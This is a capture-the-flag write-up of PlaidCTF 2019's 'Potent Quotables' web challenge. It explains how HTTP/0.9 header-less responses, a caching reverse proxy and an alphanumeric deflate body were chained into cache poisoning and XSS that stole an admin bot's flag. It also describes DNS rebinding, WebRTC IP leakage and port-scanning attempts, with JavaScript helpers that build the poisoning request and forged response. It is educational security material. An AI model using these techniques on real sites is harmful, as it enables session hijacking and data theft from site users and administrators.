PlaidCTF 2019: Potent Quotables (Web 300)

pspaul

2019-04-16

Challenge Author: Plaid Parliament of Pwning
Category: Web
Points: 300
Solves: 10

Description

I set up a little quotes server so that we can all share our favorite quotes with each other. I wrote it in Flask, but I decided that since it’s mostly static content anyway, I should probably put some kind of caching layer in front of it, so I wrote a caching reverse proxy. It all seems to be working well, though I do get this weird error when starting up the server:

* Environment: production

    WARNING: Do not use the development server in a production environment.

    Use a production WSGI server instead.

I’m sure that’s not important.

Oh, and don’t bother trying to go to the /admin page, that’s not for you.

Hint: Extra server
Alternate server for PQ: http://quotables2.pwni.ng:1337/ (same configuration in all respects)

Writeup

For TL;DR see below.

What We Got

The web app was a collection of quotes. There was a start page which showed featured quotes. Anyone could create a new quote, since there was no login system. Quotes consisted of the actual quote and an attribution. Everyone could vote +1 or -1 on a quote. Quotes could also be reported to an admin.

Glancing under the hood, we found one big JS file that held all the client logic. It acted differently based on the current path. On the featured page it loaded the featured quotes from /api/featured. When looking at a single quote, it took the quote’s ID from the URL fragment, loaded the quote data from /api/quote/${id} and the quote’s voting score from /api/score/${id}. There was also a status page for each report, which had basically the same logic as the quote page, but got the data from /api/report/${id}. Most of the API calls were POST requests, even if they only fetched data and didn’t send anything.

When submitting a quote for report, the status page showed whether or not the quote had been visited yet. Most of the time it was visited almost instantly. The POST request that initiated a report contained the whole URL, not just the quote’s ID. So we tried to insert an arbitrary URL, which led to a visit from a friendly HeadlessChrome/75.0.3738.0.

The description also mentions /admin, which gives us a page with two links, Visit next report and Flag. Both give us Access denied.

The binary is what the description says: An HTTP reverse proxy with caching functionality. We will take a closer look into it later.

First educated guesses

Since there is a report mechanism, it is likely that we have to exploit a client-side web vuln, such as XSS.

The hint in the description about the environment only told us that this should be a Flask/Werkzeug server on the backend but since it did not say Environment: development, we were not sure if there was something else that it should have told us.

Since I am more of a web guy than a reversing or pwning guy, I did not look at the binary at first. Since the web app had a relatively secure Content Security Policy header in place (only none, self or nonced sources), I thought that the way to go might be to use a bug in the proxy to bypass the CSP. So I started to look for XSS first, because the reversing would only be worth doing once I had found something.

Looking for that XSS 👀

The JavaScript that handles the loading of the quote data puts the response data into an element’s innerHTML, which looks very suspicious, especially because in other cases it uses innerText 🤔🤔🤔. The code looks like this:

result = api(`/api/quote/${uid}`)
    .then((data) => {
        let quote = data;
        let attribution = undefined;
        let index = data.indexOf("\n-");

        if (index >= 0) {
            quote = data.substring(0, index);
            attribution = data.substring(index+2);
        }

        document.querySelectorAll(`input[data-init='report-path']`).forEach((elt) => {
            elt.value = window.location.href;
        });

        document.querySelectorAll(`[data-init='quote']`).forEach((elt) => {
            elt.innerHTML = quote;
        });

        document.querySelectorAll(`[data-init='attribution']`).forEach((elt) => {
            elt.innerHTML = attribution || "(Unattributed)";
        });
    })
    .then(() => api(`/api/score/${uid}`))
    .then((data) => {
        document.querySelectorAll(`[data-init='score']`).forEach((elt) => {
            elt.innerText = data;
        });
    })
    .then(() => {
        document.querySelectorAll(".voting").forEach((elt) => {
            elt.dataset.uid = uid;
        });

        setupVoteButtons();
    });

When trying to create a quote with HTML tags, they were properly escaped by the backend. We tried hard to confuse it and cause an escaping error, but it looked safe. We then thought about the data.indexOf()/data.substring() part in the JS. Maybe we could use multi-byte characters to confuse substring() into splitting one of those into < or >? Turns out we couldn’t.
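To make the dead end concrete, here is a minimal sketch of the same split logic pulled out into a standalone function. The name splitQuote is ours and not part of the challenge code. It shows that substring() counts UTF-16 code units, so the worst it can do is cut a character into lone surrogates, which never turn into < or >.

```javascript
// Mirrors the client-side split: everything before the first "\n-" is the
// quote, everything after those two characters is the attribution.
// splitQuote is a hypothetical helper name, not taken from the challenge.
function splitQuote(data) {
  const index = data.indexOf("\n-");
  if (index < 0) {
    return { quote: data, attribution: undefined };
  }
  return {
    quote: data.substring(0, index),
    attribution: data.substring(index + 2),
  };
}

// An emoji outside the BMP occupies two UTF-16 code units.
const parts = splitQuote("\u{1F600}\n-someone");

// Cutting the emoji in half yields a lone high surrogate, not markup.
const half = "\u{1F600}".substring(0, 1);
```

Since indexOf() and substring() agree on the unit they count in, the split always lands exactly on the "\n-" separator.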

The voting also looked safe, because we could only send the values +1 or -1, otherwise the server returned Not ok. So how tf do we XSS this?

The binary

Meanwhile, a few team mates had already looked into the binary, so I joined them to maybe find something interesting.

It was a 64-bit ELF executable that takes a port as the first argument and listens there. On connection it starts a thread that handles the connection. The thread detaches itself and starts to read an HTTP request. It does so by first reading the request line and parsing it. It then reads the headers line by line and saves them, but throws away old headers with the same header name. It then sets some default headers to prepare the request to be sent to the actual backend:

Host: the value of the PROXY_HOST env variable
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3
Connection: close
Proxy-Connection: close
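The header handling described above can be modelled roughly like this. This is a sketch of our understanding, not decompiled code: the function name buildUpstreamHeaders is made up, and we assume header names are compared case-sensitively and that the defaults replace whatever the client sent.

```javascript
// Hypothetical model of the proxy's header handling (not the real binary).
const DEFAULT_USER_AGENT =
  "Mozilla/5.0 (X11; Linux x86_64; rv:10.0.3) Gecko/20120305 Firefox/10.0.3";

function buildUpstreamHeaders(rawHeaderLines, proxyHost) {
  const headers = new Map();
  for (const line of rawHeaderLines) {
    const colon = line.indexOf(":");
    if (colon < 0) continue; // this sketch simply skips malformed lines
    const name = line.slice(0, colon).trim();
    const value = line.slice(colon + 1).trim();
    // A later header replaces an earlier one with the same name.
    headers.set(name, value);
  }
  // Assumption: the defaults overwrite client-supplied values.
  headers.set("Host", proxyHost); // value of PROXY_HOST in the real proxy
  headers.set("User-Agent", DEFAULT_USER_AGENT);
  headers.set("Connection", "close");
  headers.set("Proxy-Connection", "close");
  return headers;
}

const upstream = buildUpstreamHeaders(
  ["X-Test: first", "X-Test: second", "Host: attacker.example"],
  "backend.example"
);
```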

After that, it checks if there is a cached response available for the request. The path of the request is used as the key. If it is a GET request and it has something matching in cache, the response is returned immediately and we are done. If it cannot find anything, it opens a connection to the backend, which is hardcoded as app:5000. It then gets the request’s Content-Length header, parses the value, allocates memory for it and reads the request body. After that, it sends the whole request to the backend and reads the response. If the response is less than 0x20000 bytes, the request was a GET request and the first response line is HTTP/1.0 200 OK, it inserts the response into the cache.
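As a rough model of those caching rules, consider the following sketch. The class and method names are ours, and it measures string length instead of raw bytes for simplicity. The important detail is that the cache decision only looks at the method, the size and the first line of whatever the backend sent.

```javascript
// Hypothetical model of the proxy cache, keyed by request path only.
const MAX_CACHED_RESPONSE = 0x20000;

class ProxyCacheModel {
  constructor() {
    this.entries = new Map();
  }

  // Only GET requests are ever answered from the cache.
  lookup(method, path) {
    if (method !== "GET") return undefined;
    return this.entries.get(path);
  }

  // Store the raw response if it satisfies the three conditions.
  maybeStore(method, path, rawResponse) {
    const firstLine = rawResponse.split("\n", 1)[0].replace(/\r$/, "");
    const cacheable =
      method === "GET" &&
      rawResponse.length < MAX_CACHED_RESPONSE &&
      firstLine === "HTTP/1.0 200 OK";
    if (cacheable) this.entries.set(path, rawResponse);
    return cacheable;
  }
}

const cache = new ProxyCacheModel();
const okResponse = "HTTP/1.0 200 OK\r\nContent-Length: 2\r\n\r\nhi";
const storedGet = cache.maybeStore("GET", "/api/featured", okResponse);
const storedPost = cache.maybeStore("POST", "/api/score/1", okResponse);
```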

Searching for some of its strings revealed that the binary seems to be the solution for a CMU lab task! So PPP is as lazy as all of us 🤣.

Our Pwning guys also took a quick look at it and declared it as safe (at least for a 300 points challenge).

But what now?

We thought about ways to maybe exploit the simple parsing of the proxy. Maybe Request Smuggling? Didn’t work. Looking at the binary did not really lead to new findings, it mostly confirmed our assumptions about it. So back to the web app.

We noticed that the quotes were the only place where HTML was being escaped, and the reports were the only place where we could input arbitrary stuff that was not HTML-escaped. But the Content-Type was application/json, and even though there was no X-Content-Type-Options: nosniff header, it did not seem to be exploitable in Chrome.

Someone noticed that one of the featured quotes said something about regular expression, so maybe the HTML escaping was implemented that way, but it looked safe.

We also tried different charsets like UTF-16, but that didn’t work either, which is not surprising since we had no control over the response charset.

How to admin

We did not really know how the admin bot authenticated itself. Cookie? Coming from an internal IP? Anything else? We tried to do some DNS rebinding since we had no other ideas. We thought that such a solution would be unintended, since the whole application logic and the binary would have been useless then. But hey, flag is flag 🤷‍♂.

We used rbndr.us to quickly set up something that would resolve to the public IP of the app or to our own server that served a script that fetched the flag or exfiltrated the cookies. There was a high level of confusion (at least for me), because the results were very different on different environments. I had my developer tools open which disabled any caching for me so the rebinding worked very well. When I sent the link as a report, it did not work at all. After I noticed the caching, I enabled the caches for me, tried some other things until it worked again for me. Still no luck with the admin bot. A team mate (kunte_) then got it working one time, which might have been a random bit flip or something, I honestly don’t know.

I then decided to check the local IP of the bot using WebRTC, which led to different IPs for each try, all in the 172.18.0.0/24 subnet. So most likely each time someone reports a URL, the backend spawns a HeadlessChrome docker container that visits it. So maybe we have to use the internal IP of the backend? I wrote a small port scanner in JavaScript and used it to scan that subnet and also its neighbours, but there wasn’t anything on port 5000.
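The WebRTC trick can be sketched as follows. This is not the script we actually used, just the commonly known approach: create a peer connection without any ICE servers and read the host candidates. The function names are ours, and discoverLocalIPs only works in a browser that still exposes local addresses in its candidates.

```javascript
// Pull the first IPv4 address out of an ICE candidate line.
function extractIPv4(candidateLine) {
  const match = /\b(\d{1,3}(?:\.\d{1,3}){3})\b/.exec(candidateLine);
  return match ? match[1] : null;
}

// Browser-only part: gather host candidates and report each address found.
// onAddress is a caller-supplied callback, e.g. one that exfiltrates the IP.
function discoverLocalIPs(onAddress) {
  const pc = new RTCPeerConnection({ iceServers: [] });
  pc.createDataChannel(""); // a channel is needed so candidates get gathered
  pc.onicecandidate = (event) => {
    if (!event.candidate) return; // null candidate marks the end of gathering
    const ip = extractIPv4(event.candidate.candidate);
    if (ip) onAddress(ip);
  };
  pc.createOffer().then((offer) => pc.setLocalDescription(offer));
}

// Example candidate line in the usual SDP format (values are made up).
const exampleCandidate =
  "candidate:842163049 1 udp 1677729535 172.18.0.5 46154 typ host";
const exampleIp = extractIPv4(exampleCandidate);
```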

After that I looked at the DNS rebinding again. I looked into how Chrome’s DNS cache works, which seemed to hold 100 or 1000 hosts (depending on the configuration). I played around with it a little to build a reliable cache eviction script. I used different approaches like adding many dns-prefetch link elements to the head, all with different hosts, which would cause the browser to resolve all of them. I also tried loading scripts, images and styles, or calling fetch() on them. Nothing worked really reliably (at least not on the HeadlessChrome), so I abandoned the idea and went to sleep.
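The dns-prefetch variant of the eviction attempt looked roughly like the sketch below. The helper name and the example.com base domain are placeholders, and the count of 1000 is only chosen to match the larger cache size mentioned above.

```javascript
// Build <link rel="dns-prefetch"> elements for many distinct hostnames so the
// browser resolves all of them and (hopefully) evicts older DNS cache entries.
// baseDomain is a placeholder for a domain whose subdomains all resolve.
function buildPrefetchLinks(count, baseDomain) {
  const links = [];
  for (let i = 0; i < count; i++) {
    links.push(`<link rel="dns-prefetch" href="//h${i}.${baseDomain}">`);
  }
  return links.join("\n");
}

const markup = buildPrefetchLinks(1000, "example.com");
```

The resulting markup would go into the head of the attacker-controlled page. As noted, this did not evict the cache reliably in HeadlessChrome.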

The breakthrough

It was a new day, but there were no new ideas, so we looked at the web app again. Maybe a bug in Flask/Werkzeug? Why does the proxy set the User-Agent header explicitly? Is there some special handling of some User-Agents?

I did not find anything related to the User-Agent, but the general HTTP parsing had a weird part: HTTP/0.9 support! When the HTTP version of the request is 0.9, the server does not respond with any headers, it directly sends the body. Coincidentally, a team mate (@LinusHenze) found this 1 or 2 minutes before me, just by trying out different HTTP versions.

We could abuse this by creating a quote that had HTTP/1.0 200 OK as the first line. We then had to send a GET /api/quote/${id} HTTP/0.9 request through the cache so the response would be cached for that path!
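The interaction can be simulated in a few lines. Everything here is a simplified model under our assumptions: modelBackend stands in for the Flask/Werkzeug server, proxyWouldCache for the proxy's cache check, QUOTE_ID is a placeholder, and the path follows the /api/quote/${uid} pattern from the client code.

```javascript
// Raw request that asks the backend for a header-less HTTP/0.9 response.
function buildPoisonRequest(quoteId) {
  return `GET /api/quote/${quoteId} HTTP/0.9\r\n\r\n`;
}

// Hypothetical backend model: for HTTP/0.9 it sends only the body.
function modelBackend(rawRequest, quoteText) {
  const version = rawRequest.split("\r\n")[0].split(" ")[2];
  if (version === "HTTP/0.9") {
    return quoteText; // no status line, no headers
  }
  // Placeholder header; the real backend sends its own set of headers.
  return `HTTP/1.0 200 OK\r\nX-Placeholder: normal headers\r\n\r\n${quoteText}`;
}

// Hypothetical proxy model: the cache check from the binary analysis.
function proxyWouldCache(rawRequest, rawResponse) {
  const method = rawRequest.split(" ")[0];
  const firstLine = rawResponse.split("\n", 1)[0].replace(/\r$/, "");
  return (
    method === "GET" &&
    rawResponse.length < 0x20000 &&
    firstLine === "HTTP/1.0 200 OK"
  );
}

// The quote text itself starts with a fake status line.
const quote =
  "HTTP/1.0 200 OK\nContent-Type: text/html; charset=utf-8\n\nattacker body";
const request = buildPoisonRequest("QUOTE_ID");
const backendOutput = modelBackend(request, quote);
```

In this model the proxy cannot tell the quote's fake status line from a real one, so the attacker-controlled text ends up in the cache as a complete response for that path.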

Now we had a method to control the headers and the body of an HTTP response! But we still couldn’t insert HTML, because the server still escaped the precious <>&"'.

Ladies and gentlemen, we got him!

We tried different encodings such as UTF-7, UTF-16, or deflate but had no luck for various reasons. UTF-7 is not supported anymore and other encodings introduced bad characters. But then a team mate (@lukas2511) found “A deflate compressor that emits compressed data that is in the [A-Za-z0-9] ASCII byte range”. After he got it working, he could create a quote that looked like this:

HTTP/1.0 200 OK
Content-Length: x
Content-Encoding: deflate
Content-Type: text/html; charset=utf-8

...(alphanumeric deflate compressed body that fetches and exfiltrates the flag)...
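The sketch below illustrates why the alphanumeric compressor was needed. It uses Node's zlib for the ordinary deflate case and does not reimplement the alphanumeric compressor itself. The helper names, the newline-separated layout and the computed Content-Length are our assumptions, and the body passed to buildQuote is a stand-in string, not real compressed data.

```javascript
const zlib = require("zlib");

// Characters the backend escapes, so they must not appear in the quote.
const ESCAPED_CHARS = /[<>&"']/;

function survivesEscaping(text) {
  return !ESCAPED_CHARS.test(text);
}

// True if every byte is in [A-Za-z0-9].
function isAlphanumeric(buf) {
  return buf.every(
    (b) =>
      (b >= 0x30 && b <= 0x39) ||
      (b >= 0x41 && b <= 0x5a) ||
      (b >= 0x61 && b <= 0x7a)
  );
}

// Assemble the quote text: fake status line, headers, blank line, body.
// Assumption: plain "\n" separators and a Content-Length equal to the body size.
function buildQuote(alnumBody) {
  return [
    "HTTP/1.0 200 OK",
    `Content-Length: ${alnumBody.length}`,
    "Content-Encoding: deflate",
    "Content-Type: text/html; charset=utf-8",
    "",
    alnumBody,
  ].join("\n");
}

// Harmless stand-in for the real payload.
const html = "<b>hello</b>";
const ordinary = zlib.deflateSync(Buffer.from(html));
const quoteText = buildQuote("PLACEHOLDERalnumBODY123");
```

The raw HTML contains escaped characters and ordinary deflate output contains bytes outside [A-Za-z0-9], so neither survives as a quote. The headers themselves contain none of the escaped characters, which is why only the body needed the special compressor.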

When he sent it to the admin bot, we got the flag!

TL;DR

HTTP/0.9 + Cache + Alphanumeric Deflate = XSS 🎉